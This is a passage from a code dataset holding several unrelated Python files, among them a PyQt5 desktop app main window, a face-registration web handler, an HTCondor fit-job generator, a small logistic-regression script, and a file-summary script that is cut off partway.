The next import works around the generated .exe crashing on launch; do not comment it out or remove it.\n# It fixes the following error seen when running from the command line:\n# ImportError: unable to find Qt5Core.dll on PATH\nimport fix_qt_import_error\n\nfrom PyQt5 import sip\nfrom PyQt5.QtCore import QMetaObject, Qt, QThread\nfrom PyQt5.QtGui import QIcon, QPixmap, QGuiApplication\nfrom PyQt5.QtWidgets import (QApplication, QHBoxLayout, QLabel, QMainWindow,\n                             QProgressBar, QPushButton, QTreeWidgetItem,\n                             QWidget, QMessageBox)\n\nfrom lib.JPDatabase.Database import JPDb, JPDbType\nfrom lib.JPFunction import readQss, setWidgetIconByName, seWindowsIcon\nfrom lib.JPPublc import JPPub, JPUser\n\n\nfrom lib.JPForms.JPFormBackup import Form_Backup\nfrom lib.JPForms.JPFormConfig import Form_Config\nfrom lib.JPForms.JPFormEnumManger import Form_EnumManger\nfrom lib.JPForms.JPFormUser import Form_User\n\nfrom Ui.Ui_FormMain import Ui_MainWindow\nfrom Ui.Ui_FormBackGround import Ui_Form as Ui_Form_back\nfrom lib.JPConfigInfo import ConfigInfo\n\n\nclass Form_Background(Ui_Form_back):\n    def __init__(self, mainform):\n        super().__init__()\n        self.Widget = QWidget()\n        self.setupUi(self.Widget)\n        # self.label.setPixmap(mainform.backPixmap)\n        self.label.setText(\"\")\n        mainform.addForm(self.Widget)\n\n\ndef loadTreeview(treeWidget, items, MF):\n    class MyThreadReadTree(QThread):  # thread class that loads the function tree\n        def __init__(self, treeWidget, items, MF):\n            super().__init__()\n            treeWidget.clear()\n            root = QTreeWidgetItem(treeWidget)\n            root.setText(0, \"Function List\")\n            root.FullPath = \"Function\"\n            self.root = root\n            self.items = items\n            #self.icoPath = MF.icoPath\n\n        def addItems(self, parent, items):\n            pub = JPPub()\n            for r in items:\n                item = QTreeWidgetItem(parent)\n                item.setText(0, r[\"fMenuText\"])\n                item.setIcon(0, QIcon(pub.getIcoPath(r[\"fIcon\"])))\n                item.jpData = r\n                item.FullPath = (parent.FullPath + '\\\\' + r[\"fMenuText\"])\n                lst = [l for l in self.items if l[\"fParentId\"] == r[\"fNMID\"]]\n                self.addItems(item, lst)\n                item.setExpanded(1)\n\n        def run(self):  # thread entry point\n            lst = [l for l in self.items if l[\"fParentId\"] == 1]\n            self.addItems(self.root, lst)\n            self.root.setExpanded(True)\n\n        def getRoot(self):\n            return\n\n    _readTree = MyThreadReadTree(treeWidget, items, MF)\n    _readTree.run()\n\n\nclass JPMainWindow(QMainWindow):\n    def __init__(self, dataBaseType: JPDbType = JPDbType.MySQL, *args, **kwargs):\n        super(JPMainWindow, self).__init__(*args, **kwargs)\n        try:\n            db = JPDb()\n            db.setDatabaseType(dataBaseType)\n            JPPub().MainForm = self\n        except Exception as e:\n            QMessageBox.warning(self, \"Notice\", str(e))\n\n        self.ui = Ui_MainWindow()\n        self.ui.setupUi(self)\n        self.ui.label_Title.setText(\"\")\n        self.commandDict = {}\n        self.logoPixmap = None\n\n        self.addOneButtonIcon(self.ui.ChangeUser, \"changeuser.png\")\n        self.addOneButtonIcon(self.ui.ChangePassword, \"changepassword.png\")\n        # self.addLogoToLabel(self.ui.label_logo)\n\n        # user switching and password change\n        objUser = JPUser()\n        objUser.INIT()  # initialized only once, at program start\n        objUser.userChange.connect(self.onUserChanged)\n        objUser.currentUserID()\n        self.ui.ChangeUser.clicked.connect(objUser.changeUser)\n        self.ui.ChangePassword.clicked.connect(objUser.changePassword)\n\n        # stacked layout\n        self.ui.stackedWidget.removeWidget(self.ui.page)\n        self.ui.stackedWidget.removeWidget(self.ui.page_2)\n\n        # hide the tree header\n        self.ui.label_FunPath.setText('')\n        self.ui.treeWidget.setHeaderHidden(True)\n\n        # set up the progress bar and label in the status bar\n        self.Label = QLabel(\"  \")\n        self.ProgressBar = QProgressBar()\n        self.statusBar = self.statusBar()\n        self.statusBar.addPermanentWidget(self.Label)\n        
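# The progress bar is likewise added as a permanent widget so it stays docked\n        # at the right edge of the status bar; showInfo()/dispInfo()/hideInfo() below\n        # use this pair to report progress of long-running operations.\n        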
self.statusBar.addPermanentWidget(self.ProgressBar)\n        self.ProgressBar.setGeometry(0, 0, 100, 5)\n        self.ProgressBar.hide()\n        self.statusBar.hide()\n\n        self.ui.splitter.setStretchFactor(0, 2)\n        self.ui.splitter.setStretchFactor(1, 11)\n\n        # connect clicks on function-tree nodes to the handler\n        self.ui.treeWidget.itemClicked[QTreeWidgetItem, int].connect(\n            self.treeViewItemClicked)\n\n    def closeEvent(self, event):\n        q = QMessageBox\n        result = q.question(self,\n                            \"Please confirm\",\n                            \"Back up the data before exiting?\",\n                            q.Yes | q.No, q.No)\n        if result == QMessageBox.Yes:\n            mypath = JPPub().getConfigData()[\"archives_path\"]\n            to = ospath.join(mypath, \"backup.sql\")\n            Form_Backup(to)\n        event.accept()\n\n    def showInfo(self, range):\n        self.ProgressBar.show()\n        self.ProgressBar.setRange(0, range)\n        self.statusBar.clearMessage()\n        self.statusBar.show()\n        QGuiApplication.processEvents()\n\n    def dispInfo(self, text, value=0):\n        self.statusBar.showMessage(text)\n        if value:\n            self.ProgressBar.setValue(value)\n        QGuiApplication.processEvents()\n\n    def hideInfo(self):\n        self.ProgressBar.hide()\n        self.ProgressBar.setRange(0, 0)\n        self.statusBar.clearMessage()\n        self.statusBar.hide()\n        QGuiApplication.processEvents()\n\n    def treeViewItemClicked(self, item, i):\n        # called when a node in the function tree is clicked\n        try:\n            self.ui.label_FunPath.setText(item.FullPath)\n            self.__getStackedWidget(item.jpData)\n        except AttributeError as e:\n            print(str(e))\n\n    def onUserChanged(self, args):\n        self.ui.label_UserName.setText(args[1])\n        loadTreeview(self.ui.treeWidget, JPUser().currentUserRight(), self)\n        Form_Background(self)\n\n    def addForm(self, form):\n        st = self.ui.stackedWidget\n        if st.count() > 0:\n            temp = st.widget(0)\n            st.removeWidget(temp)\n            try:\n                JPPub().UserSaveData.disconnect(temp.UserSaveData)\n            except Exception:\n                pass\n            del temp\n        st.addWidget(form)\n\n    def getIcon(self, icoName) -> QIcon:\n        return QIcon(JPPub().getIcoPath(icoName))\n\n    def getPixmap(self, icoName) -> QPixmap:\n        return QPixmap(JPPub().getIcoPath(icoName))\n\n    def addOneButtonIcon(self, btn, icoName):\n        icon = QIcon(JPPub().getIcoPath(icoName))\n        btn.setIcon(icon)\n\n    def addLogoToLabel(self, label):\n        if self.logoPixmap:\n            label.setPixmap(self.logoPixmap)\n\n    def addButtons(self, frm: QWidget, btns, styleName='Layout_Button'):\n        \"\"\"Add buttons to the form's 'Layout_Button' layout\"\"\"\n        layout = frm.findChild((QHBoxLayout, QWidget), styleName)\n        if not (layout is None):\n            layout.setSpacing(2)\n            for m in btns:\n                btn = QPushButton(m['fMenuText'])\n                btn.NMID = m['fNMID']\n                btn.setObjectName(m['fObjectName'])\n                self.addOneButtonIcon(btn, m['fIcon'])\n                btn.setEnabled(m['fHasRight'])\n                layout.addWidget(btn)\n        else:\n            errStr = \"No layout named 'Layout_Button' was found in form [{}]\".format(\n                frm.objectName())\n            errStr = errStr + \", unable to add buttons.\"\n            logging.getLogger().warning(errStr)\n        # wire up slots by object name\n        QMetaObject.connectSlotsByName(frm)\n\n    def __getStackedWidget(self, sysnavigationmenus_data):\n        '''Switch the form shown in the stacked widget'''\n        frm = None\n        btns = sysnavigationmenus_data['btns']\n        self.menu_id = sysnavigationmenus_data['fNMID']\n        sys_formCreater = {\n            10: Form_EnumManger,\n            13: Form_User,\n            14: Form_Config\n        }\n        form_createor = {**sys_formCreater, **self.commandDict}\n        if self.menu_id == 12:\n            self.close()\n        elif self.menu_id in form_createor:\n            frm = form_createor[self.menu_id](self)\n        else:\n            frm = Form_Background(self)\n        # try to add buttons to the form; it must contain a layout named 'Layout_Button'\n        self.addButtons(frm, btns)\n        return\n\n\nclass JPMianApp():\n    def __init__(self, defultConfigDict: dict):\n        \"\"\"User application wrapper\"\"\"\n        super().__init__()\n        # high-DPI display setup\n        QApplication.setAttribute(Qt.AA_EnableHighDpiScaling)\n        
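# Note: AA_EnableHighDpiScaling must be set before the QApplication instance\n        # is created below; 'Fusion' is chosen for a uniform cross-platform look.\n        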
QApplication.setStyle('Fusion')\n        self.__app = QApplication(argv)\n        cfg = ConfigInfo(defultConfigDict)\n        self.__mainForm = JPMainWindow()\n\n        # configure the log file and log level from the config file\n        level = int(cfg.debug.level)\n        fn = cfg.debug.logfile\n        logger = logging.getLogger()\n        logger.setLevel(level)\n        f_handler = logging.FileHandler(fn, encoding=\"utf-8\", mode=\"a\")\n        f_handler.setLevel(level)\n        f_handler.setFormatter(logging.Formatter(\n            \"%(asctime)s - %(levelname)s - %(filename)s line[:%(lineno)d] - %(message)s\"))\n        conHandler = logging.StreamHandler()\n        conHandler.setLevel(level)\n        conHandler.setFormatter(logging.Formatter(\n            \"%(asctime)s - %(levelname)s - %(filename)s line[:%(lineno)d] - %(message)s\"))\n        logger.addHandler(f_handler)\n        logger.addHandler(conHandler)\n\n    def show(self):\n        \"\"\"Start the application\"\"\"\n        # start listening for data-change events\n        JPPub().receiveMessage(self.__app)\n        self.__mainForm.showMaximized()\n        sys_exit(self.__app.exec_())\n\n    def setCommand(self, dict: dict):\n        \"\"\"Store the mapping from user form IDs to the objects that create them\"\"\"\n        self.__mainForm.commandDict = dict\n\n    def setMainFormLogo(self, logoName: str):\n        '''Set the main form logo; the argument is the icon file name'''\n        pixmap = QPixmap(JPPub().getLogoPath(logoName))\n        self.__mainForm.ui.label_logo.setPixmap(pixmap)\n        self.__mainForm.logoPixmap = pixmap\n\n    def setAppIcon(self, logoName: str):\n        '''Set the application icon; the argument is the icon file name'''\n        icon = QIcon()\n        icon.addPixmap(\n            QPixmap(JPPub().getIcoPath(logoName)))\n        self.__mainForm.setWindowIcon(icon)\n\n    def setMainFormTitle(self, title: str):\n        '''Set the application title and the text at the top of the main window'''\n        self.__mainForm.ui.label_Title.setText(title)\n        self.__mainForm.setWindowTitle(title)\n\n\nif __name__ == \"__main__\":\n    app = JPMianApp({})\n    dic = {}\n    app.setCommand(dic)\n    app.show()\n","sub_path":"app/mainApp.py","file_name":"mainApp.py","file_ext":"py","file_size_in_byte":11131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"317386910","text":"import mechanicalsoup\nimport json\n\n\nclass Nifty50:\n    def getnifty50(self):\n        browser = mechanicalsoup.StatefulBrowser()\n        url = \"https://www.nseindia.com/live_market/dynaContent/live_watch/stock_watch/niftyStockWatch.json\"\n        response = browser.open(url)\n        output = json.loads(response.text)\n        return output\n\n    def populate(self):\n        browser = mechanicalsoup.StatefulBrowser()\n        url = \"https://www.nseindia.com/live_market/dynaContent/live_watch/stock_watch/niftyStockWatch.json\"\n        response = browser.open(url)\n        output = json.loads(response.text)\n        #print(output)\n        #file = open(\"nifty50.txt\", \"w\")\n        with open('nifty50.json', 'w') as outfile:\n            json.dump(output, outfile)\n        #file.write(str(output))\n        #print(\"After write\")\n        return True\n\n    def getBankIndex(self):\n        bankvalue = \"\"\n        data = json.load(open('nifty50.json'))\n        bankvalue = data[\"advances\"]\n        return bankvalue\n\n","sub_path":"Nifty50.py","file_name":"Nifty50.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"533987476","text":"# -*- encoding: utf-8 -*-\nimport logging\n\nfrom handlers.mainHandler import MainHandler\nfrom interface.faceAdd import faceAdd\nfrom interface.faceUpdate import faceUpdate\nfrom utils.errorCodeManager import ServerError, ClientError\nfrom utils.helper import getTimeRotatingLogger, decodeImage, getImageSavePrefix, SUCCESS_FLAG_0, SUCCESS_FLAG_1\n\nDONT_REPLACE_FLAG = 0\n\nclass FaceAdd(MainHandler):\n    \"\"\"\n    Face registration handler\n    1. Validate the registration request; if required fields are missing, fail with a message\n    2. Save the uploaded image\n    3. 
Register the face and log the result\n    \"\"\"\n\n    def get(self):\n        self.write(\"Connected\")\n\n    def post(self):\n        ## STEP1: set the response headers\n        self._set_response_header()\n\n        ## STEP2: parse the request body\n        data = self._parse_request_body()\n        if not data:\n            return\n\n        ## STEP3: validate the required, non-empty parameters\n        normal = self.verify_face_add_request_integrity(data)\n        if not normal:\n            return\n\n        app_id = data[\"app_id\"]\n        uid = data[\"uid\"].strip()\n        image = data[\"image\"]\n        is_rep = self.get_is_rep(data)\n        quality_level = self.get_quality_level(data)\n\n        ## STEP4: get the logger\n        log = getTimeRotatingLogger(app_id, logging.INFO)\n\n        ## STEP5: decode the image\n        try:\n            img = decodeImage(image)\n        except Exception as e:\n            self.set_response_body(SUCCESS_FLAG_0, ServerError.IMG_DECODE_FAILED)\n            log.exception(e)\n            self.finish()\n            return\n\n\n        try:\n            ## STEP6: save the uploaded image\n            img_name = getImageSavePrefix() + '.png'\n            self.save_request_image(app_id, img_name, img)\n\n            ## STEP7: business logic\n            success_flag, error = faceAdd(uid, img, self.frp, quality_level, app_id)\n\n            if success_flag == SUCCESS_FLAG_1:\n                self.write({\n                    \"success\": success_flag,\n                })\n                log.info(\"image: %s uid: %s face registered successfully\" % (img_name, uid))  # log the result\n            elif is_rep != DONT_REPLACE_FLAG and error == ServerError.USER_ALREADY_EXISTS:\n                self.face_update(uid, img, img_name, log, quality_level, app_id)\n            else:\n                self.set_response_body(success_flag, error)\n                log.error(\"image: %s uid: %s face registration failed! %s\" % (img_name, uid, error.message))  # log the result\n        except Exception as e:\n            self.set_response_body(SUCCESS_FLAG_0, ServerError.FACE_ADD_FAILED)\n            log.error(\"image: %s uid: %s face registration failed! %s\" % (img_name, uid, e.args[0]))  # log the result\n            log.exception(e)\n        finally:\n            self.finish()\n            return\n\n    def verify_face_add_request_integrity(self, request_body):\n        \"\"\"\n        Check that the request contains all required fields: app_id, uid, image...\n        :param request_body: the request body\n        :return: True if all required fields are present, otherwise False\n        \"\"\"\n        if \"app_id\" not in request_body.keys():\n            self.set_response_body(SUCCESS_FLAG_0, ClientError.NECESSARY_PARAMETER_MISSING)\n            self.finish()\n            return False\n\n        if \"uid\" not in request_body.keys() or \"image\" not in request_body.keys():\n            self.set_response_body(SUCCESS_FLAG_0, ClientError.NECESSARY_PARAMETER_MISSING)\n            self.finish()\n            return False\n\n        return True\n\n    def get_is_rep(self, request_body):\n        if \"is_rep\" in request_body.keys():\n            return request_body[\"is_rep\"]\n        else:\n            return DONT_REPLACE_FLAG\n\n    def face_update(self, uid, img, img_name, log, quality_level, app_id):\n        try:\n            success_flag, error = faceUpdate(uid, img, self.frp, quality_level, app_id)\n            if success_flag == SUCCESS_FLAG_1:\n                self.write({\n                    \"success\": success_flag,\n                })\n                log.info(\"image: %s uid: %s face updated successfully\" % (img_name, uid))  # log the result\n            else:\n                self.set_response_body(success_flag, error)\n                log.error(\"image: %s uid: %s face update failed! %s\" % (img_name, uid, error.message))  # log the result\n        except Exception as e:\n            self.set_response_body(SUCCESS_FLAG_0, ServerError.FACE_UPDATE_FAILED)\n            log.error(\"image: %s uid: %s face update failed! 
%s\" % (img_name, uid, e.args[0]))  # log the result\n            log.exception(e)\n\n\n\n\n\n","sub_path":"face_server/handlers/faceAddHandler.py","file_name":"faceAddHandler.py","file_ext":"py","file_size_in_byte":4652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"182572831","text":"#!/usr/bin/env python\nimport os\nimport sys\nfrom glob import glob\n#from configparser import ConfigParser\nimport numpy as np\nimport stat\n\nopr = {\n    'cW': [-1,1],\n    'cHWB': [-20,20],\n    'cHl3' : [-2,2],\n    'cHq1':[-4,4],\n    'cHq3': [-4,4],\n    'cll1': [-2,2],\n    'cHbox': [-20,20],\n    'cHDD' : [-20,20], \n    'cHl1' : [-20,20], \n    'cHW': [-8,8] , \n    'cqq11': [-2,2] , \n    'cqq1' : [-2,2] , \n    'cqq31': [-2,2] , \n    'cqq3': [-3,3] , \n    'cll': [-5,5] \n}\n\ndef redemensionOpinput(config):\n    sample = config.getlist(\"general\", \"sample\")\n    ops = config.getlist(\"eft\", \"operators\")\n\n    ops = [i[1:-1].split(\":\") for i in ops]\n    ops = [list(map(str, sublist)) for sublist in ops]\n\n    # one operator set given for several samples: replicate it per sample\n    if len(sample) > len(ops) and len(ops) == 1:\n        return ops*len(sample)\n\n    # otherwise the counts must match one-to-one\n    elif len(sample) != len(ops):\n        sys.exit(\"[ERROR] Ambiguity in the definition of samples and op per sample\")\n    \n    else:\n        return ops\n\ndef createOpRange(config):\n\n    if not config.has_option(\"eft\", \"fitranges\"): \n        all_ops = np.unique([item for subs in redemensionOpinput(config) for item in subs])\n        return dict((i, [-10,10]) for i in all_ops)\n    \n    else:\n        or_ = config.getlist(\"eft\", \"fitranges\")\n        return dict( (i.split(\":\")[0], [ float(i.split(\":\")[1]) , float(i.split(\":\")[2]) ] ) for i in or_ )\n\ndef makeT2WFitCondor(path, model, ops, opr, npoints):\n    path = os.path.abspath(path)\n\n    modeltot2w = {\n        \"EFT\": \"EFT\",\n        \"EFTNeg\": \"EFTNegative\",\n        \"EFTNeg-alt\": \"EFTNegative\"\n    }\n\n    mod = modeltot2w[model]\n    ranges = \":\".join(\"k_\"+op+\"={},{}\".format(opr[op][0],opr[op][1]) for op in ops)\n\n    f = open(path + \"/submit.sh\", 'w')\n    f.write(\"#!/bin/sh\\n\")\n    f.write(\"#-----------------------------------\\n\")\n    f.write(\"# Automatically generated # \\n\")\n    f.write(\"# by mkDCInputs.py # \\n\")\n    f.write(\"#-----------------------------------\\n\")\n    f.write(\"\\n\\n\\n\")\n\n    f.write(\"source /cvmfs/cms.cern.ch/cmsset_default.sh\\n\")\n    f.write(\"cd {}\\n\".format(path))\n    f.write(\"eval `scram run -sh`\\ncd -\\n\")\n    f.write(\"cp -r {} ./\\n\".format(path))\n\n    to_w = \"text2workspace.py {}/datacard.txt -P HiggsAnalysis.AnalyticAnomalousCoupling.AnomalousCoupling{}:analiticAnomalousCoupling{} -o model.root \\\n            --X-allow-no-signal --PO eftOperators={}\".format(path, mod, mod, \",\".join(op for op in ops)) \n    if \"alt\" in model: to_w += \" --PO eftAlternative\"\n    \n    to_w += \"\\n\"\n    f.write(to_w)\n\n    f.write(\"#-----------------------------------\\n\")\n    to_w = \"combine -M MultiDimFit model.root --algo=grid --points {} -m 125 -t -1 --robustFit=1 --X-rtd FITTER_NEW_CROSSING_ALGO --X-rtd FITTER_NEVER_GIVE_UP --X-rtd FITTER_BOUND --redefineSignalPOIs {} --freezeParameters r --setParameters r=1 --setParameterRanges {} --verbose -1\".format(npoints, \",\".join(\"k_\"+op for op in ops), ranges)\n    to_w += \"\\n\"\n    f.write(to_w)\n    f.write(\"cp model.root {}\\n\".format(path))\n    f.write(\"cp higgsCombineTest.MultiDimFit.mH125.root {}\\n\".format(path))\n    \n    f.close()\n\n    st = os.stat(path + \"/submit.sh\")\n    os.chmod(path + \"/submit.sh\", st.st_mode | stat.S_IEXEC)\n\ndef makeBatchSub(path):\n    path = os.path.abspath(path)\n    f = open(path + \"/submit.sub\", 'w')\n    f.write(\"executable = 
{}/submit.sh\\n\".format(path))\n    f.write(\"output = {}/submit.out\\n\".format(path))\n    f.write(\"error = {}/submit.err\\n\".format(path))\n    f.write(\"log = {}/submit.log\\n\".format(path))\n    # job attributes must come before 'queue'; HTCondor ignores anything set after it\n    f.write(\"+JobFlavour = 'microcentury'\\n\")\n    f.write(\"queue 1\\n\")\n    f.close()\n\ndef makeSub(path_, all_paths):\n\n    f = open(path_ + \"/submit_all.sh\", 'w')\n    for path in all_paths:\n        f.write(\"condor_submit {}/submit.sub\\n\".format(path))\n        f.write(\"# ------------------------------------------------------ #\\n\")\n\n    f.close()\n    st = os.stat(path_ + \"/submit_all.sh\")\n    os.chmod(path_ + \"/submit_all.sh\", st.st_mode | stat.S_IEXEC)\n\nif __name__ == \"__main__\":\n\n    \"\"\"\n    if len(sys.argv) < 5: sys.exit(\"[ERROR] Provide folder path, prefix, process name, config file, after running mkDatacards.py ...\")\n\n    subf = glob(sys.argv[1] + \"/*/\")\n    prefix = sys.argv[2]\n    process = sys.argv[3]\n    cfg = sys.argv[4]\n    npoints = 20000\n    if len(sys.argv) > 5:\n        npoints = sys.argv[5]\n\n    config = ConfigParser(converters={'list': lambda x: [str(i.strip()) for i in x.split(',')]})\n    config.read(cfg)\n    \"\"\"\n\n    if len(sys.argv) < 4: sys.exit(\"[ERROR] Provide folder path, prefix, process name, [npoints = 20000], [models = EFTNeg] after running mkDatacards.py ...\")\n\n    subf = glob(sys.argv[1] + \"/*/\")\n    prefix = sys.argv[2]\n    process = sys.argv[3]\n    npoints = 20000\n    models = [\"EFTNeg\"]\n    if len(sys.argv) > 4:\n        npoints = sys.argv[4]\n    if len(sys.argv) > 5:\n        models = sys.argv[5].split(\",\")\n    all_sub_paths = []\n\n    print(\". . . @ @ @ Retrieving folders @ @ @ . . .\")\n    \n    for s in subf:\n        subfolder = s.split(\"/\")[-2]\n        prc = subfolder.split(prefix+\"_\")[-1]\n        ops = prc.split(process + \"_\")[-1]\n        ops = ops.split(\"_\")\n        \n        for model in models:\n            vars_ = glob(s + \"/\" + model + \"/datacards/\" + prc + \"/*/\")\n            print(\"[INFO] Running: {}, model: {}, tot fits: {}\".format(s, model, len(vars_)))\n            for v in vars_:\n                makeT2WFitCondor(v, model, ops, opr, npoints)\n                makeBatchSub(v)\n\n                all_sub_paths.append(os.path.abspath(v))\n\n    makeSub(sys.argv[1], all_sub_paths)\n\n    print(\". . . @ @ @ Done @ @ @ . . 
.\")\n\n\n\n\n","sub_path":"createCondor.py","file_name":"createCondor.py","file_ext":"py","file_size_in_byte":5645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"213553065","text":"import requests\n\n# URL routed to the Django upload view\nurl = 'http://127.0.0.1:8000/upload/'\n\n# the 'file' key corresponds to request.FILES['file'] inside the view\nfile = {'file': open('sample.png', 'rb')}\n\n# Send the request.\nres = requests.post(url, files=file)\n\n# res.text contains the URL for accessing the uploaded image.\nprint(res.text)\n","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"40865343","text":"from setuptools import setup\n\nrequires = [\n    'fedmsg',\n]\n\nsetup(\n    name='bugyou',\n    version='0.1',\n    description='',\n    author='',\n    author_email='',\n    url='https://github.com/kushaldas/autocloud',\n    install_requires=requires,\n    packages=[],\n    include_package_data=True,\n    zip_safe=False,\n    classifiers=[\n        'Environment :: Web Environment',\n        'Topic :: Software Development :: Libraries :: Python Modules',\n        'Intended Audience :: Developers',\n        'Programming Language :: Python',\n    ],\n    entry_points={\n        'moksha.consumer': [\n            \"bugyou_consumer = bugyou.consumer:BugyouConsumer\",\n        ],\n    },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"263207914","text":"from crawler.asyncSpider.core.start_spider import run\nfrom crawler.asyncSpider.utils.utils import logger\n\n\nclass AsyncSpider(object):\n    name = None\n    crawler = None\n    custom_setting = {}\n\n    def __init__(self, crawler, name=None, **kwargs):\n        AsyncSpider.crawler = crawler\n        self.logger = logger\n        self._set_crawler(crawler)\n        if name is not None:\n            self.name = name\n        if not hasattr(self, \"start_urls\"):\n            self.start_urls = []\n\n    @classmethod\n    def from_crawler(cls, crawler, *args, **kwargs):\n        spider = cls(crawler, *args, **kwargs)\n\n        return spider\n\n    @classmethod\n    def start_spider(cls, spider=None):\n        run(spider)\n\n    @classmethod\n    def stop_spider(cls):\n        cls.crawler.stop()\n\n    def _set_crawler(self, crawler):\n        self.crawler = crawler\n        self._load_settings()\n\n    def _load_settings(self):\n        self.settings = self.crawler.settings\n        self.settings.set_dict(self.custom_setting)\n\n    async def start_requests(self):\n        raise NotImplementedError","sub_path":"crawler/asyncSpider/core/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"61851573","text":"import numpy as np\n\n\nnp.random.seed(42)\nx_1 = np.random.randn(100,1)\nx_2 = np.random.randn(100,1)\n\n\ndef sigmoid(x): return 1/(1 + np.exp(-x)) \n\ndef loss(y,y_hat): return -(y*np.log(y_hat)+(1-y)*np.log(1-y_hat))\n\n\ny = sigmoid(2*x_1 - x_2 + 0.5 + .1*np.random.randn(100,1))\ny = np.where(y >= 0.5, 1, 0)  # convert to 1/0, probability boundary 0.5 \n\n\n# train test split\nidx = np.arange(100)\nnp.random.shuffle(idx)\ntrain_idx = idx[:80]\nval_idx = idx[80:]\nx1_train, x2_train, y_train = x_1[train_idx], x_2[train_idx], y[train_idx]\nx1_val, x2_val, y_val = x_1[val_idx], x_2[val_idx], y[val_idx]\n\n# initialize parameters\nnp.random.seed(42)\nw_1 = np.random.randn(1)\nw_2 = np.random.randn(1)\nb = np.random.randn(1)\n#print(w_1, w_2, b)\n\n'''\nTrain Model\n'''\n# learning rate eta\nlr = 1e-1\nepochs 
= 1000\nlength = len(x1_train)\nloss_old = 99999999999999999999\nloss_new = 0\n\nfor epoch in range(epochs):\n    y_hat_liste = np.empty([length,1]) \n    loss_liste = np.empty([length,1])\n    # reset the accumulated gradients at the start of every epoch\n    delta_w1 = 0\n    delta_w2 = 0\n    delta_b = 0\n\n    for i in range(length): # iterate over all training values to get y_hat for each pair x_1, x_2\n        z = x1_train[i] * w_1 + x2_train[i] * w_2 + b\n        y_hat = sigmoid(z)\n        y_hat_liste[i] = y_hat\n        \n        loss_liste[i] = loss(y_train[i],y_hat) # calculate the loss for all y_hat\n        \n    for m in range(length): # calculate the partial derivatives for w_1, w_2, b\n        delta_w1 += (y_hat_liste[m]-y_train[m])*x1_train[m]\n        delta_w2 += (y_hat_liste[m]-y_train[m])*x2_train[m]\n        delta_b += y_hat_liste[m]-y_train[m] \n    '''\n    loss_new = sum(loss_liste)/len(loss_liste) #adapt learning rate to get better result\n    if lr > 1e-3:\n        if loss_new > loss_old:\n            lr /= 2\n        else:\n            loss_old = loss_new\n    else:\n        loss_old = loss_new\n    ''' \n    delta_w1 = delta_w1/length\n    delta_w2 /= length\n    delta_b /= length\n    \n    w_1 -= lr*delta_w1\n    w_2 -= lr*delta_w2\n    b -= lr*delta_b\n    \nprint(\"Values of the model:\\n W_1 = \",w_1,\"\\n W_2 = \",w_2,\"\\n b = \",b) \n\n\n\n'''\nEvaluate Model\n'''\nlength_val = len(y_val)\ny_hat_liste_val = np.empty([length_val,1]) \nloss_liste_val = np.empty([length_val,1])\n\nfor i in range(length_val): # iterate over all validation values to get y_hat for each pair x_1, x_2\n    z = x1_val[i] * w_1 + x2_val[i] * w_2 + b\n    y_hat_val = sigmoid(z)\n    y_hat_liste_val[i] = y_hat_val\n    \n    loss_liste_val[i] = loss(y_val[i],y_hat_val) \n\n\ncount_prob = 0 # evaluate the accuracy of the model\nfor n in range(0,length_val):\n    if y_hat_liste_val[n] > 0.5:\n        y_hat_liste_val[n] = 1\n    else:\n        y_hat_liste_val[n] = 0\n\n    if int(y_hat_liste_val[n]) == y_val[n]:\n        count_prob += 1\n\nloss = sum(loss_liste_val)/len(loss_liste_val)\nprint(\"Loss = \",loss,\"\\nProbability = \",count_prob/length_val)\n","sub_path":"Exercise_04/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"463181062","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/12/6 0006 13:40\n# @Author : boy\n# @File : get_scripts.py\n# @Software: PyCharm\n\nimport datetime\nimport io\nimport os\nimport time\n'''\nProcess one file\nfilename: the file to process\nCompute the maximum and the average per date and write the results to a file\n'''\ndef deal(filename):\n    with io.open(filename,'r',encoding='utf-8') as f:\n        lines = f.readlines()\n        first_date = lines[0].split()[0]\n        max_val = float(lines[0].split()[2])\n        result = [x.rstrip() for x in lines]\n        result.append('0 0 0')\n        total = 0\n        flag = 0\n        for tmp in result:\n            row = [x for x in tmp.split()]\n            if row[0] == first_date:\n                if float(row[2]) > max_val:\n                    max_val = float(row[2])\n                total += float(row[2])\n                flag += 1\n            else:\n                path = \"result/\"\n                (filepath, tempfilename) = os.path.split(filename)\n                (file_name, extension) = os.path.splitext(tempfilename)\n                tmp_filename = path + file_name + '_result.txt'\n                with io.open(tmp_filename ,'a+',encoding='utf-8') as w :\n                    w.writelines(\"{0} {1} {2}\".format(first_date, max_val, '%.2f' %(total/flag))+ '\\n')\n                print(\"{0} {1} {2}\".format(first_date, max_val, '%.2f' %(total/flag)))\n                # restart the counters from the current row so the first entry\n                # of the new date is not lost\n                first_date = row[0]\n                max_val = float(row[2])\n                total = float(row[2])\n                flag = 1\n\n'''\nUsage notes\n'''\ndef readme():\n    path = \"files/\"\n    files = os.listdir(path)\n    print(\"==========================================================\")\n    print(\"Usage:\")\n    print(\"Put the files to process in the files directory; results go to the result directory\")\n    
